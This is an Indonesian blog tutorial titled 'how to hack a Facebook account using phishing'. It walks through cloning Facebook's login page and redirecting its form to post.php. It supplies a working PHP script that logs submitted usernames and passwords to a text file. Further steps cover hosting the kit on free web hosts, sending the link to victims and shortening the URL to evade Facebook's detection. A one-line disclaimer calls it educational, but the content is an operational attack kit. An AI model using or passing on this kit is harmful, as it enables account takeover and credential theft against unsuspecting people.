ut Cara Meretas Akun Facebook Menggunakan Phishing - Turi Production

Kamis, 17 Mei 2018

Cara Meretas Akun Facebook Menggunakan Phishing


Phishing adalah metode yang paling sering digunakan untuk meretas Facebook. Teknik yang paling banyak digunakan dalam phishing adalah penggunaan Fake Log in Pages, juga dikenal sebagai halaman palsu. Halaman-halaman login palsu ini mirip dengan halaman login asli dari situs-situs seperti Yahoo, Gmail, MySpace dll. Korban terkecoh untuk mempercayai halaman Facebook palsu untuk menjadi yang asli dan memasukkan kata sandinya. Tetapi setelah pengguna mencoba untuk masuk melalui halaman-halaman ini, detail login Facebook-nya dicuri. Anda dapat membuat halaman login phishing untuk meretas facebook menggunakan phishing.

Langkah 1

Untuk meretas facebook menggunakan phishing, pertama-tama, pergi ke Facebook dan kemudian klik kanan pada area kosong, Anda akan melihat halaman opsi tampilan halaman cukup klik itu

Langkah 2


Sekarang tab akan terbuka yang akan berisi kode sumber halaman login Facebook.

Langkah 3
 
pilih semua kode dan salin semua kode lalu tempelkan ke notepad.

Langkah 4

 
Ketika kode sumber disisipkan di notepad setelah itu tekan Ctrl + F dan ketik aksi di notepad.

Langkah 5

Anda harus mencari lagi dan lagi sampai Anda menemukan teks yang terlihat seperti
action = ”https://www.facebook.com/login.php?login_attempt=1&lwv=111“

Langkah 6
 
Setelah itu hapus semua teks yang ditulis dengan warna hijau dan bukannya menulisnya Post.php. Setelah itu, akan terlihat seperti aksi = "post.php"

Langkah 7. 

 
Simpan di desktop Anda atau di penyimpanan hard drive dengan nama index.htm dan ya ingatlah tidak sebagai index.html karena banyak kali orang menyimpannya sebagai index.html.




Anda telah sepenuhnya membuat halaman phishing Anda yang akan terlihat seperti yang diberikan dalam gambar di bawah ini

Langkah 8
Sekarang Anda perlu membuat file php untuk ini Buka notepad baru dan salin kode yang diberikan di bawah ini dan simpan dengan nama post.php.

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>



Anda telah berhasil membuat dua file 1. index.htm dan 2. post.php

Langkah 9
Anda perlu mengunggah dua file ini di situs web hosting gratis. beberapa situs web hosting terbaik yang berguna untuk Anda. Anda perlu membuat akun di salah satu situs web hosting di bawah ini.


1. www.my3gb.com
2. Hostinger
3. www.000webhost.com
4. Freehosting

Saya lebih suka www.000webhost.com

Langkah 10

 
Sekarang Anda harus mendaftar cukup mengisi semua informasi yang diperlukan dalam formulir pendaftaran. Ketika akun Anda sepenuhnya tersusun, cukup masuk dengan nama pengguna dan kata sandi Anda.

Langkah 11
 
Buka Cpanel (panel kontrol) lalu klik pada pengelola file, setelah itu akan muncul jendela baru. Sekarang buka public_html.

Langkah 12
 
Hapus file bernama default.php setelah itu Anda perlu mengunggah file index.htm dan post.php klik tombol upload file dan unggah kedua file satu per satu. Sekarang klik pada index.htm yang akan terlihat sama seperti di halaman Facebook asli. ini adalah halaman phishing Anda.

Langkah 13
Salin URL halaman itu dan kirim tautan ini ke korban di Facebook, Gmail, atau di mana pun Anda inginkan, ketika korban membuka tautan itu ia melihat halaman Facebook palsu yang terlihat seperti nyata dan memasukkan nama pengguna dan kata sandi dan tekan masuk kata sandinya , halaman redirects terhubung ke facebook dan Anda akan dapat melihat passwordnya dengan masuk ke akun 000webhost.com dan pergi ke manajer file dan kemudian public_html di sini Anda akan menemukan file baru sebagai username.txt. Sebelum mengirim tautan ini kepada siapa pun, persingkat URL-nya terlebih dahulu yang dapat membantu Anda untuk tidak terdeteksi oleh Facebook. Anda berhasil meretas Facebook menggunakan Phishing.

phishing adalah pelanggaran kriminal dan aktivitas ilegal jadi jangan coba-coba kepada siapa pun. Tutorial ini untuk tujuan pendidikan.

Tidak ada komentar:

Posting Komentar

komentar